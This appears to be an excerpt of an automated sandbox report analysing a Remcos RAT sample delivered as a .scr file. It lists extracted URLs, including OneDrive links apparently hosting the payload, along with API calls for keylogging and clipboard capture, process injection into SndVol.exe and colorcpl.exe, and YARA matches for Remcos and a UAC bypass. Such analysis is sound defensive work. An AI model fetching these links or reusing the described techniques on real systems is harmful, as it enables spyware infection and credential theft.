Source: bhv3259.tmp.4.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertCloudServicesCA-1-g1.crl0
Source: bhv3259.tmp.4.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: bhv3259.tmp.4.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhv3259.tmp.4.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: bhv3259.tmp.4.dr	String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
Source: bhv3259.tmp.4.dr	String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0~
Source: HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996605803.000000007F470000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
Source: HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996605803.000000007F470000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: SndVol.exe, 00000003.00000003.2022947923.00000000034D0000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000003.00000003.2017852244.00000000034BE000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000003.00000002.4408677302.00000000034F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp
Source: SndVol.exe, 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, colorcpl.exe, 0000000D.00000002.2251885365.0000000006F80000.00000040.00000400.00020000.00000000.sdmp, colorcpl.exe, 0000000D.00000002.2247045059.0000000000400000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp/C
Source: SndVol.exe, 00000003.00000003.2050939936.00000000034BE000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000003.00000003.2022947923.00000000034AF000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000003.00000002.4408617814.00000000034BE000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000003.00000003.2299239501.00000000034BE000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000003.00000003.2051064837.00000000034BE000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000003.00000003.2017852244.00000000034BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpY
Source: SndVol.exe, 00000003.00000003.2019710060.00000000034F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gph
Source: HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996605803.000000007F470000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: bhv3259.tmp.4.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: bhv3259.tmp.4.dr	String found in binary or memory: http://ocsp.digicert.com0:
Source: HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996605803.000000007F470000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996605803.000000007F470000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: bhv3259.tmp.4.dr	String found in binary or memory: http://ocsp.digicert.com0H
Source: bhv3259.tmp.4.dr	String found in binary or memory: http://ocsp.digicert.com0I
Source: HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996605803.000000007F470000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: bhv3259.tmp.4.dr	String found in binary or memory: http://ocsp.msocsp.com0
Source: bhv3259.tmp.4.dr	String found in binary or memory: http://ocsp.msocsp.com0S
Source: HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996605803.000000007F470000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996605803.000000007F470000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0C
Source: bhv3259.tmp.4.dr	String found in binary or memory: http://ocspx.digicert.com0E
Source: bhv3259.tmp.4.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: bhv3259.tmp.4.dr	String found in binary or memory: http://www.digicert.com/CPS0~
Source: SndVol.exe, 00000003.00000002.4419868717.000000001E690000.00000040.10000000.00040000.00000000.sdmp, SndVol.exe, 00000008.00000002.2032938486.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.ebuddy.com
Source: SndVol.exe, 00000003.00000002.4419868717.000000001E690000.00000040.10000000.00040000.00000000.sdmp, SndVol.exe, 00000008.00000002.2033248521.000000000322D000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000008.00000002.2032938486.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.com
Source: SndVol.exe, 00000008.00000002.2033248521.000000000322D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.imvu.comata
Source: SndVol.exe, 00000003.00000002.4419868717.000000001E690000.00000040.10000000.00040000.00000000.sdmp, SndVol.exe, 00000008.00000002.2032938486.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: SndVol.exe, 00000003.00000002.4419868717.000000001E690000.00000040.10000000.00040000.00000000.sdmp, SndVol.exe, 00000008.00000002.2032938486.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.comr
Source: bhv3259.tmp.4.dr	String found in binary or memory: http://www.msftconnecttest.com/connecttest.txt?n=1696428304750
Source: SndVol.exe, 00000004.00000002.2047760751.0000000000963000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://www.nirsoft.net
Source: SndVol.exe, 00000008.00000002.2032938486.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.nirsoft.net/
Source: HGTQP09643009.scr.exe, 00000000.00000002.2033128865.000000007FCE9000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2003278216.00000000022E2000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.pmail.com
Source: HGTQP09643009.scr.exe, 00000000.00000002.2002800587.0000000000803000.00000004.00000020.00020000.00000000.sdmp, Jsqwmpul.PIF, 0000000C.00000002.2251582423.0000000000934000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://2hhi9w.am.files.1drv.com/
Source: Jsqwmpul.PIF, 00000009.00000002.2160077550.000000000078E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://2hhi9w.am.files.1drv.com/gd
Source: HGTQP09643009.scr.exe, 00000000.00000002.2002800587.0000000000803000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://2hhi9w.am.files.1drv.com/y4mBwd_O0orCZYCB-m72OLd7ovLPprUM4laUDtpNM9mFpZXV0m08RNxiySgMwrezLWp
Source: Jsqwmpul.PIF, 0000000C.00000002.2251582423.0000000000934000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://2hhi9w.am.files.1drv.com/y4mGwuSSuFxuDDvpAJ_fbrE3BKuKW5XqcUBzuNsRzBm8cRH2dyNR7edm5BhYh2ZPGwC
Source: Jsqwmpul.PIF, 0000000C.00000002.2251582423.0000000000934000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://2hhi9w.am.files.1drv.com/y4mGwuSSuFxuDDvpAJ_fbrE3L
Source: Jsqwmpul.PIF, 0000000C.00000002.2251582423.0000000000934000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://2hhi9w.am.files.1drv.com/y4mGwuSSuFxuDDvpAJ_fbrE3LL
Source: Jsqwmpul.PIF, 0000000C.00000002.2251582423.0000000000934000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://2hhi9w.am.files.1drv.com/y4mKPtT-rAbG4inW0O2_-07PoRY_sfXHa6qbFlkBszZbmAY1MzHswFDHO6u63PruOhI
Source: Jsqwmpul.PIF, 00000009.00000002.2160077550.000000000078E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://2hhi9w.am.files.1drv.com/y4mPer_JvrxbylmNPC7e_eDC5k1q6183BqTBthJtctBOaRiGjAhjc2kQZzIhZZ1Vh_Y
Source: HGTQP09643009.scr.exe, 00000000.00000002.2002800587.0000000000803000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://2hhi9w.am.files.1drv.com:443/y4mBwd_O0orCZYCB-m72OLd7ovLPprUM4laUDtpNM9mFpZXV0m08RNxiySgMwre
Source: Jsqwmpul.PIF, 0000000C.00000002.2251582423.0000000000934000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://2hhi9w.am.files.1drv.com:443/y4mGwuSSuFxuDDvpAJ_fbrE3BKuKW5XqcUBzuNsRzBm8cRH2dyNR7edm5BhYh2Z
Source: Jsqwmpul.PIF, 00000009.00000002.2160077550.000000000078E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://2hhi9w.am.files.1drv.com:443/y4mPer_JvrxbylmNPC7e_eDC5k1q6183BqTBthJtctBOaRiGjAhjc2kQZzIhZZ1
Source: bhv3259.tmp.4.dr	String found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=P
Source: bhv3259.tmp.4.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
Source: bhv3259.tmp.4.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
Source: bhv3259.tmp.4.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
Source: bhv3259.tmp.4.dr	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: bhv3259.tmp.4.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpX
Source: bhv3259.tmp.4.dr	String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: bhv3259.tmp.4.dr	String found in binary or memory: https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-LAX31r5a&FrontEnd=AF
Source: bhv3259.tmp.4.dr	String found in binary or memory: https://fp-afd-nocache.azureedge.net/apc/trans.gif?77686a33b2eafa1538ef78c3be5a5910
Source: bhv3259.tmp.4.dr	String found in binary or memory: https://fp-afd-nocache.azureedge.net/apc/trans.gif?caa2cf97cacae25a18f577703684ee65
Source: bhv3259.tmp.4.dr	String found in binary or memory: https://fp-afd.azurefd.us/apc/trans.gif?0cf92be82316943650f2ee723bc6949e
Source: bhv3259.tmp.4.dr	String found in binary or memory: https://fp-afd.azurefd.us/apc/trans.gif?94fb5ac9609bcb4cda0bf8acf1827073
Source: bhv3259.tmp.4.dr	String found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?7e9591e308dbda599df1fc08720a72a3
Source: bhv3259.tmp.4.dr	String found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?c6a2869c584d2ea23c67c44abe1ec326
Source: bhv3259.tmp.4.dr	String found in binary or memory: https://fp.msedge.net/conf/v1/asgw/fpconfig.min.json
Source: Jsqwmpul.PIF, 00000009.00000002.2160077550.000000000076F000.00000004.00000020.00020000.00000000.sdmp, Jsqwmpul.PIF, 0000000C.00000002.2251582423.0000000000905000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://live.com/
Source: HGTQP09643009.scr.exe, 00000000.00000002.2002800587.0000000000803000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://live.com/5
Source: bhv3259.tmp.4.dr	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: bhv3259.tmp.4.dr	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: bhv3259.tmp.4.dr	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: SndVol.exe	String found in binary or memory: https://login.yahoo.com/config/login
Source: bhv3259.tmp.4.dr	String found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
Source: bhv3259.tmp.4.dr	String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
Source: bhv3259.tmp.4.dr	String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
Source: bhv3259.tmp.4.dr	String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
Source: bhv3259.tmp.4.dr	String found in binary or memory: https://maps.windows.com/windows-app-web-link
Source: bhv3259.tmp.4.dr	String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-04-14-10-35/PreSignInSettingsConfig.json
Source: bhv3259.tmp.4.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=4954a0
Source: HGTQP09643009.scr.exe, 00000000.00000002.2002800587.00000000007B0000.00000004.00000020.00020000.00000000.sdmp, Jsqwmpul.PIF, 00000009.00000002.2160077550.000000000072F000.00000004.00000020.00020000.00000000.sdmp, Jsqwmpul.PIF, 0000000C.00000002.2251582423.00000000008E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://onedrive.live.com/
Source: Jsqwmpul.PIF, 0000000C.00000002.2281075353.000000002C5ED000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://onedrive.live.com/downlo
Source: Jsqwmpul.PIF, 0000000C.00000002.2281075353.000000002C5A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://onedrive.live.com/download?resid=6D087DEFFAB8CBA7%21222&authkey=
Source: bhv3259.tmp.4.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
Source: bhv3259.tmp.4.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
Source: bhv3259.tmp.4.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
Source: bhv3259.tmp.4.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
Source: bhv3259.tmp.4.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
Source: bhv3259.tmp.4.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-0debb885be07c402c948.js
Source: bhv3259.tmp.4.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
Source: bhv3259.tmp.4.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ec3581b6c9e6e9985aa7.chunk.v7.js
Source: bhv3259.tmp.4.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
Source: bhv3259.tmp.4.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.6c288f9aff9797959103.chunk.v7.js
Source: bhv3259.tmp.4.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.9ba2d4c9e339ba497e10.chunk.v7.js
Source: bhv3259.tmp.4.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-1652fd8b358d589e6ec0.js
Source: bhv3259.tmp.4.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.52c45571d19ede0a7005.chunk.v7.j
Source: bhv3259.tmp.4.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.d918c7fc33e22b41b936.chunk.v7.c
Source: bhv3259.tmp.4.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
Source: bhv3259.tmp.4.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
Source: bhv3259.tmp.4.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
Source: bhv3259.tmp.4.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
Source: bhv3259.tmp.4.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
Source: bhv3259.tmp.4.dr	String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
Source: bhv3259.tmp.4.dr	String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
Source: bhv3259.tmp.4.dr	String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
Source: bhv3259.tmp.4.dr	String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
Source: bhv3259.tmp.4.dr	String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
Source: bhv3259.tmp.4.dr	String found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
Source: bhv3259.tmp.4.dr	String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
Source: bhv3259.tmp.4.dr	String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
Source: HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996605803.000000007F470000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: SndVol.exe, 00000003.00000002.4419868717.000000001E690000.00000040.10000000.00040000.00000000.sdmp, SndVol.exe, 00000008.00000002.2032938486.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: SndVol.exe	String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: bhv3259.tmp.4.dr	String found in binary or memory: https://www.office.com/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704

Source: unknown	HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.5:49722 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to register a low level keyboard hook

Source: C:\Windows\SysWOW64\SndVol.exe

Code function: 3_2_0040A2B8 SetWindowsHookExA 0000000D,0040A2A4,00000000

3_2_0040A2B8

Source: C:\Windows\SysWOW64\SndVol.exe

Code function: 3_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,

3_2_0040B70E

Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,	3_2_004168C1
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_0536758E OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalFix,GlobalUnWire,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalFix,GlobalUnWire,CloseClipboard,	3_2_0536758E
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 4_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,	4_2_0040987A
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 4_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	4_2_004098E2
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 7_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	7_2_00406DFC
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 7_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,	7_2_00406E9F

Source: C:\Windows\SysWOW64\SndVol.exe

Code function: 3_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,

3_2_0040B70E

Source: C:\Windows\SysWOW64\SndVol.exe

Code function: 3_2_0040A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,

3_2_0040A3E0

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 3.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.6f80000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.SndVol.exe.5350000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.SndVol.exe.53518cd.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.6f818cd.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.6f818cd.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.SndVol.exe.53518cd.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.SndVol.exe.5350000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.6f80000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4419622044.000000001E42F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2251885365.0000000006F80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2251261824.0000000003129000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.2246883380.0000000003129000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4408561480.0000000003483000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2247045059.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SndVol.exe PID: 6352, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 5900, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

Spam, unwanted Advertisements and Ransom Demands

Contains functionalty to change the wallpaper

Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_0041C9E2 SystemParametersInfoW,		3_2_0041C9E2
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_0536D6AF SystemParametersInfoW,		3_2_0536D6AF

System Summary

Malicious sample detected (through community Yara rule)

Source: 3.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 3.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 3.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 13.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 13.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 13.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 13.2.colorcpl.exe.6f80000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 13.2.colorcpl.exe.6f80000.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 13.2.colorcpl.exe.6f80000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 3.2.SndVol.exe.5350000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
